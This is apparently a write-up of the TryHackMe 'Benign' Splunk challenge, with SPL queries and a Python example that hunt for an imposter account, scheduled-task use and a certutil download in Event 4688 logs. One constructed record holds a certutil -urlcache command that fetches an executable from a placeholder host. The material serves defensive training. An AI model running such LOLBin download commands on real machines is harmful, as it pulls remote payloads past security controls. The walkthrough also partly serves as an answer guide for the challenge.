Splunk - Benign

Threat hunting on SIEM (Splunk)

By Ren Sie

Refer to Benign for the challenge room on TryHackMe

Scenario

One of the client’s Intrusion Detection Systems (IDS) flagged a suspicious process on a computer in the HR department, suggesting it might be compromised. We observed tools related to network information gathering and scheduled tasks running on the affected machine, which confirmed our suspicion. Because of limited resources, we could only collect the process execution logs with Event ID: 4688. We then imported these logs into Splunk using the win_eventlogs index for further investigation.

Network Information

IT Department      HR department      Marketing department
James              Haroon             Bell
Moin               Chris              Amelia
Katrina            Diana              Deepak

Activity

How many logs are ingested from the month of March 2022?
As stated in the scenario, the logs are in the ‘win_eventlogs’ index. Set the search time range to start on March 1, 2022 and cover that whole month, then run the search and read the event count.

index="win_eventlogs"

Imposter Alert: There seems to be an imposter account observed in the logs, what is the name of that user?
By examining the list of all available usernames, we can identify the imposter account.

index="win_eventlogs"
| dedup UserName
| table UserName

Which user from the HR department was observed to be running scheduled tasks?
By searching for schtasks.exe on the search head, we can identify the executed scheduled tasks. Based on the results, we can identify the user by referencing the department personnel list provided at the beginning.

index="win_eventlogs" schtasks.exe
| dedup UserName
| table UserName ProcessName

Note: schtasks.exe is a Windows utility for creating, deleting, configuring, and displaying scheduled tasks. dedup can eliminate duplicate user entries.

Which user from the HR department executed a system process (LOLBIN) to download a payload from a file-sharing host?
By filtering the events on the HR personnel's usernames, I identified that one user ran the certutil utility to download benign.exe from a file-sharing host.

index="win_eventlogs" UserName="Chris.fort" OR UserName="haroon" OR UserName="Daina"
| dedup ProcessName CommandLine
| table UserName ProcessName CommandLine

Note: the -urlcache option tells certutil to act on URL cache entries; combined with -f and a URL, it fetches the remote file to disk, which is why certutil is abused as a download LOLBin and why this command line is worth alerting on.
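The imposter check, the schtasks.exe hunt and the certutil download hunt above, reproduced as plain Python over a few constructed 4688-style records so the logic can be tested without a Splunk instance. This is an added example, not code from the write-up or the TryHackMe room; the roster comes from the Network Information table, users are matched on the first name before any dot (so a spelling variant such as the Daina in the query above would need adding to the roster), and the download host and file paths in the sample records are placeholders.

```python
# Roster from the scenario's Network Information table.
ROSTER = {"IT": {"James", "Moin", "Katrina"},
          "HR": {"Haroon", "Chris", "Diana"},
          "Marketing": {"Bell", "Amelia", "Deepak"}}
HOMOGLYPHS = str.maketrans("01", "ol")  # digits commonly swapped for letters

def _first(user):  # "Chris.fort" -> "chris"
    return user.split(".")[0].lower()

def _dept_of(user):
    """Department of an exact first-name roster match, else None."""
    for dept, members in ROSTER.items():
        if _first(user) in {m.lower() for m in members}:
            return dept
    return None

def imposters(events):
    """Usernames absent from the roster, marked 'lookalike' when they match a
    roster name only after homoglyph normalisation (e.g. 0 for o)."""
    known = {_first(m).translate(HOMOGLYPHS) for d in ROSTER.values() for m in d}
    out = {}
    for e in events:
        u = e["UserName"]
        if _dept_of(u) is None:
            out[u] = "lookalike" if _first(u).translate(HOMOGLYPHS) in known else "unknown"
    return out

def dept_users_running(events, dept, exe):
    """Department members observed launching an executable, e.g. schtasks.exe."""
    return sorted({e["UserName"] for e in events
                   if e["ProcessName"].lower().endswith(exe) and _dept_of(e["UserName"]) == dept})

def lolbin_downloads(events, dept="HR"):
    """certutil -urlcache download commands issued by members of the department."""
    return [(e["UserName"], e["CommandLine"]) for e in events
            if e["ProcessName"].lower().endswith("certutil.exe")
            and "-urlcache" in e["CommandLine"].lower() and _dept_of(e["UserName"]) == dept]

def _ev(user, proc, cmd):
    return {"UserName": user, "ProcessName": proc, "CommandLine": cmd}

SAMPLE = [  # constructed 4688-style records; the download host is a placeholder
    _ev("James", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
    _ev("Chris.fort", r"C:\Windows\System32\schtasks.exe", "schtasks /query /fo LIST"),
    _ev("Chris.fort", r"C:\Windows\System32\certutil.exe",
        "certutil -urlcache -f https://files.example.invalid/benign.exe C:\\Users\\Public\\benign.exe"),
    _ev("Har00n", r"C:\Windows\System32\whoami.exe", "whoami /all"),
    _ev("Bell", r"C:\Windows\System32\cmd.exe", "cmd /c dir"),
]
```

In Splunk the same roster comparison is usually done with a lookup table rather than a hard-coded dict, but the matching rules are the same.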

To bypass the security controls, which system process (lolbin) was used to download a payload from the internet?
The process name is visible in the ProcessName column of the previous search results.

What was the date that this binary was executed by the infected host?
By left-clicking the event and selecting 'View Events', we can locate the execution date in the event's timestamp.

Which third-party site was accessed to download the malicious payload?
The host site is identified in the CommandLine from the previous screenshot.

Note: The specific host site provides file hosting and sharing services that are commonly used for uploading and distributing files.

What is the name of the file that was saved on the host machine from the C2 server during the post-exploitation phase?
The downloaded file is in the CommandLine as indicated in the previous screenshot.

The suspicious file downloaded from the C2 server contained malicious content with the pattern THM{..........}; what is that pattern?
By navigating to the URL found in the CommandLine section of the previous screenshot, we can access the content that was downloaded by the user.

What is the URL that the infected host connected to?
The URL is detailed in the CommandLine section of the event log screenshot.
